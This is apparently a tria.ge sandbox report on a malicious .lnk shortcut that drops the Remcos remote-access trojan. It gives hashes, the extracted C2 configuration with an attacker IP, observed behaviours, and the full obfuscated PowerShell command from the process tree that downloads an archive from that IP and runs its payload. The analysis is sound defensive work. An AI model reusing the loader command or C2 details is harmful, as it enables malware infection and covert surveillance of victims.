Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
31/08/2024, 01:02
General
-
Target
oshad_88.docx.lnk
-
Size
15KB
-
MD5
b8fb0340c7a12ae9d4a3847ac14308cb
-
SHA1
4675f3d8a12942068e609fd2f12f2f020fe5762e
-
SHA256
a2bfa5db078137d391b392758fca56b34c8d3c9b0a7e23b1ba9fa9a2edf91000
-
SHA512
d9504ca3211e14412ba697d43983e21d100143c5a68be1799e74a704ac76ee6dc999aef09bcd10fb87b9b975bd8184815b6fc2e90ebd96e4f737244a6546d6b0
-
SSDEEP
48:88muavUQSEfFy63YMEDo/atNixCyQvGDDo/DBdCZZGXu/dZZIa7x:88y8GFy63hXEIxCyQ/zuqQ
Malware Config
Extracted
remcos
feetfuck
83.222.191.201:24251
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-XTJ1YO
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Blocklisted process makes network request 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 8 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 19 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\oshad_88.docx.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo sviYiTDifmVgwUmQzFgOPYIV; echo JzJdBqRYxLImYrcCLbpdqvjXsIJfpWlZfWY; echo ZKgorOmcNJZZMbukHvugkdfvZrLIe; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo SRChLBIQjesWVTeXbGypCUPpLnWGEpbzmlAuNYge; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo tAtLAczHKJaDGfRcGQexTEXSHDzsHxFvifZtnswW; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/oshad_88.docx -OutFile oshad_88.docx; echo SQwXgOGQnSfQxMfeOlQMGbil; s''t''a''rt oshad_88.docx2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exeC:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\oshad_88.docx" /o ""3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.2MB
MD53115302e2b5fe948bc1688f640c95f04
SHA12a4c6da043fd62311f7e0be9386a61d950c0d8f1
SHA256e17d46519af0013d5d98cfccbe48067f194c75bab3a6abe570045a2b26c433be
SHA512c7a026fffe3e8c55de78b482e6aebecc5fce7b2703b1ad0a890f70d76f965c4f95acff78bbff0427492fc466af7c8d66fe85c8cb40ddc2c051f6b0868a91ea76
-
Filesize
405B
MD576aef0f3b84edde82ebcd68680836ee4
SHA1b3e649d6ca499d05ad8f498d805d911304f2db8f
SHA256e1ad71ad7b8fe9b523d3efcf2e389391432f5eee6387583a758bd76ca0bc9487
SHA51258a39f935074cac4fa7e427343717dd6f0a1a62b1f4eb97e3a2054cbf0d52a2b2d1f49bcfd2c6ee3841326ec272795e1665df701a97e88773eb720a2886692d8
-
Filesize
3KB
MD5f82d947e42dcaa7a325b10d6f4affa41
SHA1d4bdf3ceb8db07786da82359d5fddd7ff8945878
SHA256915eb03548d9c37df4261747b03c8a8cd545d3249a09188379f40c71a5dc5179
SHA51230e60445f8cd4b21bfe0f45bb9db26971c363a6bfb8b2aa573750b17002c27c357a6fcb5c15e4d866afd122aa0c0e924a3c0c69fca3b879ba78f35617b7b9f2a
-
Filesize
4KB
MD538b2ee31d14be5eda8b801aca218356b
SHA19789daefb6a05af310243c5d815b79bcb302599e
SHA256fe4ce08aa8169b34b39073eb9fd3d8b0d8daf4306bde42a878a27faba8914b63
SHA5127cda57ecff74d4eeeb52df7675bb7e240da72884fb9bd0449069742871e492659d459404e8908e20c84e877e6a6055e6bb269ff182abec33fbf7dcc61b1524e6
-
Filesize
2.1MB
MD5db7e67835fce6cf9889f0f68ca9c29a9
SHA15565afda37006a66f0e4546105be60bbe7970616
SHA256dbd3057a58fd3407c95418bc5d9c253adc8c658ee338f22d58374ed3ea37b738
SHA512bc2714bb408715e5e1cec1337b831e26dbda208183955a07ec8653a38c9c0f25f60f333a154b738927ce085e7bbff438963b941a6c2773b3e7325cd900e7651b
-
Filesize
1.1MB
MD559c15c71fd599ff745a862d0b8932919
SHA18384f88b4cac4694cf510ca0d3f867fd83cc9e18
SHA256c4ed07ad748661ce776ac6ebb4f8bef7619586bfb4443ce58c92d4b889f3d5c2
SHA512be3425d55dcaa361bc8481b87b2086454baca79a3c948de9acf9ef7d3084d6d987c328d665b45dfcd0510e2c97c980aa63d7cd669fe9fc1a67983c325593481e
-
Filesize
1.4MB
MD56fdb2e9ca6b7a5ad510e2b29831e3bc8
SHA14a14ee9d5660eb271a6b5f18a55ac3e05f952c68
SHA256f510c85b98fa6fe8d30133114a34b7f77884aa58e57a0561722eeb157dc98a38
SHA512d5248dd902d862afa060ab829fc3a39dccc26dab37737e14a3f9b90b1d3f900b3bf5821f450502a2124016acf0e84bd8979758827a92741f879b2fa4addfda06
-
Filesize
31KB
MD55dc69a3e2fda6cb740f363ef77edcc13
SHA1c177fabf17346531e07d562be11915bf2822148a
SHA2567c24abda04537749bfb1b2d2aa57a7c9261f41012435269347f7eb2d05f71621
SHA512b32848b6eded965245b759be1b72b6fc81acb4002eceae96004e88e549e21eb6eb1ceb3e51f6249d7dfb739f31223e623f7c525f677939bc935d2f6bffb50a9f
-
Filesize
1.0MB
MD5471076308d78944d45ab35d37134134a
SHA105cf2cf6e5d11ce10425b14d68cda3246cc47263
SHA25638d10ba2f4411eba8351d5b3fed74ca46bf856569dca757d055eb49d8471e11b
SHA5127f140546ceda85d3c178a61689a0743c75623b7d1e2dcc3e2d29128d7e13d9671cdb660ca46312dbd8ff3d63c12836caf1a6a54c074d66bed269184044bdd9c3
-
Filesize
15KB
MD535a1aa0fc4972286c1db07e513c3abbc
SHA189f5e48e02a03978cd7931651518472c38a7b272
SHA256be338409f57304177e56712593a9345b54d8361ef1fdc767a2fc683a6508cb4e
SHA512f111c86ea937763d091ed195507ee9b3bc95854e22bf31142a9e96bdeb5c273f91f803ea463f8296d5ce611de3a9d959e993fbc03261022a074a203d14ad29c4
-
Filesize
2.1MB
-
Filesize
2.1MB
-
Filesize
10.8MB
-
Filesize
40KB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
72KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
2.0MB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
2.0MB
-
Filesize
2.4MB
-
Filesize
1.4MB
-
Filesize
1.1MB
-
Filesize
1.5MB
-
Filesize
1.1MB
-
Filesize
1.4MB
-
Filesize
1.1MB
-
Filesize
2.0MB
-
Filesize
1.1MB
-
Filesize
1.5MB
-
Filesize
1.4MB
-
Filesize
2.4MB
-
Filesize
1.4MB